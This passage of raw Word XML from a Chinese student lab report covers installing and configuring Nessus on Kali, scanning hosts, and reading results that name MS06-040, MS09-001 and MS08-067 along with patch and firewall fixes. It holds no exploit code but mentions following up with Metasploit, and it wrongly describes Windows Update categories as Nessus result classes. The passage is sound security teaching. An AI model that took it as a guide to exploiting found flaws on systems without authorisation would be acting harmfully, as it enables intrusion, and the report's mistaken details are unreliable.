      </w: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3、实验内容及步骤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下载软件包的时候一定要找一个网速很好并且稳定的地方，最好不要使用热点，这是前人之鉴。</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(1):下载软件包</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进入官网下载</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instrText xml:space="preserve"> HYPERLINK "https://www.tenable.com/downloads/nessus" </w:instrText>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fldChar w:fldCharType="separate"/>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https://www.tenable.com/downloads/nessus</w:t>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fldChar w:fldCharType="end"/>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73040" cy="1438275"/>
            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>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78"/>
                    <a:srcRect r="72" b="17935"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="14382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(2):选择I agree</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96535" cy="3406775"/>
            <wp:effectExtent l="0" t="0" r="12065" b="2222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79"/>
                    <a:srcRect r="-373" b="8291"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5296535" cy="34067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:将下载的软件包拖到Kali</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84470" cy="3225165"/>
            <wp:effectExtent l="0" t="0" r="24130" b="63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0"/>
                    <a:srcRect r="-144" b="8238"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5284470" cy="322516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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>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(4):安装Nessus</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67325" cy="2361565"/>
            <wp:effectExtent l="0" t="0" r="15875" b="635"/>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1"/>
                    <a:srcRect r="181" b="12391"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="236156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(5):启动Nessus</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76850" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="6350" b="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82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276850" cy="5334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(6):查看Kali的IP</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84470" cy="2324735"/>
            <wp:effectExtent l="0" t="0" r="24130" b="12065"/>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83"/>
                    <a:srcRect r="-144" b="12833"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5284470" cy="23247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(7):在物理机上进行连接</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https://kali的IP地址:8834</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55260" cy="2687320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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84"/>
                    <a:srcRect r="409" b="11279"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5255260" cy="268732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(8):获取激活码(邮箱一定写正确，否则收不到激活码)</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或者输入这个网址查询激活码</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kern w:val="0"/>
          <w:sz w:val="24"/>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instrText xml:space="preserve"> HYPERLINK "http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code" </w:instrText>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fldChar w:fldCharType="separate"/>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http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code</w:t>
      </w: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fldChar w:fldCharType="end"/>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699635" cy="4263390"/>
            <wp:effectExtent l="0" t="0" r="2476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85"/>
                    <a:srcRect r="121" b="6750"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4699635" cy="426339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(9):输入激活码</w:t>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776470" cy="3036570"/>
            <wp:effectExtent l="0" t="0" r="24130" b="11430"/>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86"/>
                    <a:srcRect r="106" b="9174"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4776470" cy="303657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(10):注册一个账号</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149725" cy="3402330"/>
            <wp:effectExtent l="0" t="0" r="15875" b="1270"/>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87"/>
                    <a:srcRect r="-384" b="7461"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4149725" cy="34023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(11):开始读条</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510405" cy="2734945"/>
            <wp:effectExtent l="0" t="0" r="10795" b="8255"/>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88"/>
                    <a:srcRect r="518" b="9135"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4510405" cy="27349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(12):提示下载失败</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079240" cy="2978785"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1841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89"/>
                    <a:srcRect r="171" b="8020"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4079240" cy="297878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(13):回到kali上输入下面这条命令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/opt/nessus/sbin/nessuscli update</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72405" cy="2000885"/>
            <wp:effectExtent l="0" t="0" r="10795" b="5715"/>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0"/>
                    <a:srcRect r="84" b="13553"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="200088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开始下载插件</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网速一定要好！网速一定要好！网速一定要好！重要的话说三遍！！！</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然后开启漫长的等待</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(14):重新安装Nessus</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818380" cy="1359535"/>
            <wp:effectExtent l="0" t="0" r="7620" b="12065"/>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1"/>
                    <a:srcRect r="-370" b="18438"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4818380" cy="13595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(15):重新启动Nessus</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2797810" cy="326390"/>
            <wp:effectExtent l="0" t="0" r="21590" b="381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92"/>
                    <a:srcRect r="29729" b="-784"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2797810" cy="32639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(16):又开始读条</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469765" cy="2688590"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="5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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:srcRect r="-271" b="9530"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4469765" cy="268859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第一次读条特别特别慢，请耐心等待。</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(17):然后进入用户名密码进入Nessus，查看是否有插件</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272405" cy="2146935"/>
            <wp:effectExtent l="0" t="0" r="10795" b="12065"/>
            <wp:docPr id="5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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94"/>
                    <a:srcRect r="84" b="11953"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="21469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Nessus配置</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1.常规设置介绍</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621020" cy="2869565"/>
            <wp:effectExtent l="0" t="0" r="17780" b="635"/>
            <wp:docPr id="5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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:srcRect r="-90" b="10266"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5621020" cy="2869565"/>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247130" cy="2825115"/>
            <wp:effectExtent l="0" t="0" r="1270" b="19685"/>
            <wp:docPr id="5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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96"/>
                    <a:srcRect r="-460" b="12075"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6247130" cy="2825115"/>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022975" cy="2492375"/>
            <wp:effectExtent l="0" t="0" r="22225" b="22225"/>
            <wp:docPr id="5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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97"/>
                    <a:srcRect r="294" b="14301"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6022975" cy="2492375"/>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828030" cy="2512695"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1905"/>
            <wp:docPr id="5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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98"/>
                    <a:srcRect r="-295" b="11890"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5828030" cy="2512695"/>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532755" cy="3789680"/>
            <wp:effectExtent l="0" t="0" r="4445" b="20320"/>
            <wp:docPr id="56"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99"/>
                    <a:srcRect r="-311" b="8718"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5532755" cy="3789680"/>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532755" cy="1961515"/>
            <wp:effectExtent l="0" t="0" r="4445" b="19685"/>
            <wp:docPr id="5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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:srcRect r="-115" b="13859"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5532755" cy="1961515"/>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4776470" cy="1929765"/>
            <wp:effectExtent l="0" t="0" r="24130" b="635"/>
            <wp:docPr id="58"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:srcRect r="-629" b="14249"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4776470" cy="1929765"/>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164580" cy="2957195"/>
            <wp:effectExtent l="0" t="0" r="7620" b="14605"/>
            <wp:docPr id="5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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:srcRect r="93" b="11966"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6164580" cy="2957195"/>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099175" cy="3566795"/>
            <wp:effectExtent l="0" t="0" r="22225" b="14605"/>
            <wp:docPr id="6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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:srcRect r="114" b="10898"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6099175" cy="3566795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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099175" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="22225" b="22225"/>
            <wp:docPr id="6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7" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:srcRect r="114" b="12152"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6099175" cy="25431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480" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="600" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>四、Nessus使用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1.扫描Windows主机</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选择好要扫描的内容及插件后，点击save，然后点击开始扫描</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544185" cy="584835"/>
            <wp:effectExtent l="0" t="0" r="18415" b="24765"/>
            <wp:docPr id="6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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:srcRect r="-495" b="35684"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544185" cy="584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查看扫描结果</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686425" cy="1854835"/>
            <wp:effectExtent l="0" t="0" r="3175" b="24765"/>
            <wp:docPr id="6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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:srcRect r="831" b="15797"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5686425" cy="1854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查看详情</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6035040" cy="2442845"/>
            <wp:effectExtent l="0" t="0" r="10160" b="20955"/>
            <wp:docPr id="6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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107"/>
                    <a:srcRect r="-190" b="12048"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6035040" cy="24428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2.扫描Linux主机</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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>选择好要扫描的内容及插件后，点击save，然后点击开始扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="cente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532755" cy="795020"/>
            <wp:effectExtent l="0" t="0" r="4445" b="17780"/>
            <wp:docPr id="6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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108"/>
                    <a:srcRect r="103" b="26869"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5532755" cy="795020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5645150" cy="1823720"/>
            <wp:effectExtent l="0" t="0" r="19050" b="5080"/>
            <wp:docPr id="66"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:srcRect r="-225" b="14702"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5645150" cy="182372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rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:right="-512" w:rightChars="-244"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>实验结果分析</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通过这次实验，我们使用Nessus扫描工具，工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件，Nessus可同时在本机或远端上遥控，进行系统的漏洞分析扫描。通过对nessus模块的熟知，对本机ip进行扫描，发现了三个漏洞，可以对其进行分析和利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1）对漏洞扫描结果进行分析，尝试找到漏洞的利用方式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发现了ms06-040、ms09-001、ms08-067这几个漏洞，</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ms06-040 “魔波”病毒利用MS06-040漏洞进行传播。传播过程中可导致系统服务崩溃，网络连接被断开等现象。被感染的计算机会自动连接指定的IRC服务器，被黑客远程控制，同时还会自动从互联网上下载的一个名为“等级代理木马变种AWP（Trojan.Proxy.Ranky.awp）”的木马病毒</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Ms09-001此安全更新解决了 Microsoft 服务器消息块 (SMB) 协议中多个秘密报告的漏洞。 此漏洞可能允许在受影响的系统上远程执行代码。 成功利用这些漏洞的攻击者可以安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。采用防火墙做法和标准的默认防火墙配置，有助于保护网络免受从企业外部发起的攻击。 按照做法，应使连接到 Internet 的系统所暴露的端口数尽可能少。</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临时解决办法：</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在防火墙处阻止 TCP 端口 139 和 445</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MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”，如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击，目前已经有利用该漏洞的蠕虫病毒。</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2）漏洞扫描结果分为哪些类？它们之间有哪些区别？</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漏洞扫描结果分为：1推荐2可选3不推荐。</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推荐：表示系统已存在漏洞，需要安装补丁，来进行修复，对于电脑安全十分重要，因此推荐的补丁，应尽快进行安装。</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可选：表示对于自身电脑情况进行有选择性的修复，对于这类补丁，大家应在对电脑自身情况有着充分的了解，再来进行选择性的修复。</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不推荐：表示如果修复这些补丁，会有可能引起系统蓝屏，无法启动等问题，因此对于这些漏洞，建议大家不要修复，以免引起更大的电脑故障。当然这些漏洞往往也是对于电脑没有太大损害的。</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3）使用平台虚拟机里面自带的nessus，对127.0.0.1进行扫描，发现了那些安全风险？并给出利用或者加固方案。</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ms06-040、ms09-001、ms08-067</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应该到官方网站下载漏洞补丁，修复漏洞</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应该立即安装杀毒软件，并使用其安装补丁，修复漏洞</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应该开启系统防火墙，并启用系统自带的更新程序，来下载系统补丁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>、实验总结及心得体会</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Nessus是一款流行的漏洞扫描工具，可以快速扫描网络和主机，发现漏洞并提供解决方案。以下是一些Nessus漏洞扫描实践总结：</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熟悉Nessus漏洞库</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Nessus漏洞库是Nessus扫描漏洞的基础。熟悉Nessus漏洞库是使用Nessus进行漏洞扫描的前提。可以通过Nessus官方网站、社区论坛等途径了解Nessus漏洞库的更新和维护情况。</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配置扫描策略</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Nessus扫描策略是指扫描时要应用的规则集。扫描策略可以包括主机选择、漏洞选择、端口选择、漏洞等级、扫描速度等。根据实际情况配置扫描策略可以提高扫描效率和准确性。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扫描范围</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在进行漏洞扫描前，需要明确扫描的范围。可以通过确定IP地址范围、扫描特定端口等方式明确扫描范围。同时，需要注意不要进行未经授权的扫描，以免违反法律法规。</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分析扫描结果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Nessus扫描结果包括漏洞报告、安全建议、安全风险评估等。分析扫描结果可以找到漏洞的原因和解决方案，制定针对性的漏洞修复计划，提高网络和主机的安全性。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定期扫描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漏洞是网络和主机安全的重要问题。定期扫描可以及时发现漏洞并提供解决方案。建议每个月或每季度进行一次扫描，及时排除安全隐患。</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配置Nessus安全设置</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Nessus提供了一些安全设置，可以帮助用户提高安全性。例如，设置访问控制、加密通信、限制漏洞扫描等。可以根据需要进行配置，提高Nessus的安全性和可靠性。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结合其他工具使用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Nessus可以与其他工具配合使用，提高扫描效率和准确性。例如，结合Metasploit可以对漏洞进行深入利用，提高漏洞修复的效果。可以根据实际情况结合其他工具使用，提高漏洞扫描的效果。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选择正确的扫描策略</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在使用Nessus进行漏洞扫描时，可以使用预定义的扫描策略或自定义的扫描策略。预定义的扫描策略可以快速启动扫描，但不能满足所有情况。如果需要更加精细的扫描控制，建议创建自定义扫描策略，这样可以控制扫描的深度、范围和目标，以满足特定的需求。</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设置合适的扫描选项</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Nessus提供了许多扫描选项，包括探测性扫描、强制扫描、远程注册表扫描、暴力破解等。为了确保扫描的安全性和有效性，应根据需要设置合适的扫描选项，并仔细评估它们的风险和收益。</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分析扫描结果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扫描完成后，需要对扫描结果进行分析和解释。Nessus提供了多种方式来分析和解释扫描结果，包括图形化报告、XML格式报告、PDF格式报告等。应根据需要选择合适的报告格式，并仔细评估扫描结果，识别高危漏洞，并确定相应的解决方案。</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跟踪漏洞修复进度</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漏洞扫描只是发现漏洞的第一步，及时跟踪漏洞修复进度也非常重要。Nessus提供了一些功能来帮助用户跟踪漏洞修复进度，例如将漏洞标记为“已解决”、“已验证”等。建议在漏洞扫描后定期跟踪漏洞修复进度，并根据需要重新扫描系统以验证修复的效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sectPr>
          <w:footerReference r:id="rId5" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1418" w:header="1134" w:footer="1134" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:type="linesAndChars" w:linePitch="312" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1" w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>四：密码破解实践</w:t>
      </w:r>
